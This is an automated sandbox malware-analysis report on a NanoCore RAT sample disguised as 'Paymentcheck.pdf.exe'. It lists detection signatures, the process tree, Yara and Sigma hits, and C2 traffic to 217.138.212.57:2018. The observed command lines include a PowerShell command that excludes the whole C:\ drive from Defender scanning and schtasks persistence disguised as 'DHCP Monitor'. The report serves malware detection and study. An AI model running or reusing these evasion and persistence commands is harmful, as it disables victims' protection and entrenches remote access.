Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Paymentcheck.pdf.exe

Overview

General Information

Sample Name:Paymentcheck.pdf.exe
Analysis ID:458302
MD5:b7e3c3c9735d6ba37616d791171fe2db
SHA1:8763c22ed1151ec2c5b584415154ec7e3c50d964
SHA256:91b97fb3f4695fd57c723b537c5b811195f9f99b0ac6033835f75444c36712b9
Tags:exeNanoCoreRAT
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Nanocore Rat
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: NanoCore
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Creates an undocumented autostart registry key
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Suspicious Process Start Without DLL
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Paymentcheck.pdf.exe (PID: 3736 cmdline: 'C:\Users\user\Desktop\Paymentcheck.pdf.exe' MD5: B7E3C3C9735D6BA37616D791171FE2DB)
    • wscript.exe (PID: 6464 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • powershell.exe (PID: 6860 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegAsm.exe (PID: 6732 cmdline: C:\Users\user\AppData\Local\Temp\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • schtasks.exe (PID: 1748 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp715E.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 6352 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7DD3.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 2340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • RegAsm.exe (PID: 1476 cmdline: C:\Users\user\AppData\Local\Temp\RegAsm.exe 0 MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • conhost.exe (PID: 1088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • dhcpmon.exe (PID: 5556 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • conhost.exe (PID: 5584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • dhcpmon.exe (PID: 6448 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • conhost.exe (PID: 7008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.939558053.0000000006030000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x4bbb:$x1: NanoCore.ClientPluginHost
  • 0x4be5:$x2: IClientNetworkHost
0000000D.00000002.939558053.0000000006030000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x4bbb:$x2: NanoCore.ClientPluginHost
  • 0x6a6b:$s4: PipeCreated
0000000D.00000002.941661352.0000000006930000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x5b0b:$x1: NanoCore.ClientPluginHost
  • 0x5b44:$x2: IClientNetworkHost
0000000D.00000002.941661352.0000000006930000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x5b0b:$x2: NanoCore.ClientPluginHost
  • 0x5c0f:$s4: PipeCreated
  • 0x5b25:$s5: IClientLoggingHost
00000000.00000002.822099971.0000000002AF6000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x47acc5:$x1: NanoCore.ClientPluginHost
  • 0x47ad02:$x2: IClientNetworkHost
  • 0x47e835:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Click to see the 48 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
13.2.RegAsm.exe.69a0000.33.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x350b:$x1: NanoCore.ClientPluginHost
  • 0x3525:$x2: IClientNetworkHost
13.2.RegAsm.exe.69a0000.33.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x350b:$x2: NanoCore.ClientPluginHost
  • 0x52b6:$s4: PipeCreated
  • 0x34f8:$s5: IClientLoggingHost
13.2.RegAsm.exe.69b0000.36.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x1f1db:$x1: NanoCore.ClientPluginHost
  • 0x1f1f5:$x2: IClientNetworkHost
13.2.RegAsm.exe.69b0000.36.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x1f1db:$x2: NanoCore.ClientPluginHost
  • 0x22518:$s4: PipeCreated
  • 0x1f1c8:$s5: IClientLoggingHost
13.2.RegAsm.exe.69a0000.33.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x170b:$x1: NanoCore.ClientPluginHost
  • 0x1725:$x2: IClientNetworkHost
Click to see the 123 entries

Sigma Overview

AV Detection:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 6732, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 6732, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

System Summary:

barindex
Sigma detected: Suspicious Process Start Without DLLShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paymentcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paymentcheck.pdf.exe, ParentProcessId: 3736, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 6732
Sigma detected: Suspicious Script Execution From Temp FolderShow sources
Source: Process startedAuthor: Florian Roth, Max Altgelt: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paymentcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paymentcheck.pdf.exe, ParentProcessId: 3736, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs' , ProcessId: 6464
Sigma detected: WScript or CScript DropperShow sources
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paymentcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paymentcheck.pdf.exe, ParentProcessId: 3736, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs' , ProcessId: 6464
Sigma detected: Non Interactive PowerShellShow sources
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe', CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs' , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 6464, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe', ProcessId: 6860
Sigma detected: Possible Applocker BypassShow sources
Source: Process startedAuthor: juju4: Data: Command: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paymentcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paymentcheck.pdf.exe, ParentProcessId: 3736, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 6732

Stealing of Sensitive Information:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 6732, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Remote Access Functionality:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 6732, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exeReversingLabs: Detection: 32%
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.3814c35.11.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.382dc19.10.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.38295f0.9.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.38295f0.9.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.5210000.21.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.5210000.21.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.5214629.20.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.394c3ad.12.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.39609da.14.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.3940179.13.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.930842679.00000000027C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.933309762.0000000003811000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.933547631.0000000003891000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Paymentcheck.pdf.exe PID: 3736, type: MEMORYSTR
Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6732, type: MEMORYSTR
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exeJoe Sandbox ML: detected
Machine Learning detection for sampleShow sources
Source: Paymentcheck.pdf.exeJoe Sandbox ML: detected
Source: 13.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
Source: 13.2.RegAsm.exe.5210000.21.unpackAvira: Label: TR/NanoCore.fadte
Source: Paymentcheck.pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: Paymentcheck.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: RegAsm.pdb source: RegAsm.exe, dhcpmon.exe, dhcpmon.exe, 00000019.00000000.859072816.0000000000DF2000.00000002.00020000.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000000D.00000000.820068225.00000000004A2000.00000002.00020000.sdmp, RegAsm.exe, 00000012.00000000.835793431.0000000000992000.00000002.00020000.sdmp, dhcpmon.exe, 00000016.00000002.844182498.0000000000E62000.00000002.00020000.sdmp, dhcpmon.exe, 00000019.00000000.859072816.0000000000DF2000.00000002.00020000.sdmp
Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]13_2_0619A2D0

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49771 -> 217.138.212.57:2018
Source: global trafficTCP traffic: 192.168.2.4:49771 -> 217.138.212.57:2018
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
Source: powershell.exe, 0000000E.00000002.930072177.0000000002E25000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
Source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmpString found in binary or memory: http://google.com
Source: powershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.933111295.0000000004BAB000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Paymentcheck.pdf.exe, 00000000.00000002.821957126.0000000002A21000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.931755679.00000000048B4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.933111295.0000000004BAB000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
Source: Paymentcheck.pdf.exe, 00000000.00000002.821699982.0000000001277000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comV
Source: Paymentcheck.pdf.exe, 00000000.00000002.821699982.0000000001277000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.coma
Source: Paymentcheck.pdf.exe, 00000000.00000002.821699982.0000000001277000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comgrita
Source: Paymentcheck.pdf.exe, 00000000.00000002.821699982.0000000001277000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comttva
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.933111295.0000000004BAB000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmpString found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand
Source: RegAsm.exe, 0000000D.00000002.933547631.0000000003891000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

E-Banking Fraud:

barindex
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.3814c35.11.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.382dc19.10.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.38295f0.9.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.38295f0.9.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.5210000.21.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.5210000.21.unpack, type: UNPACKEDPE
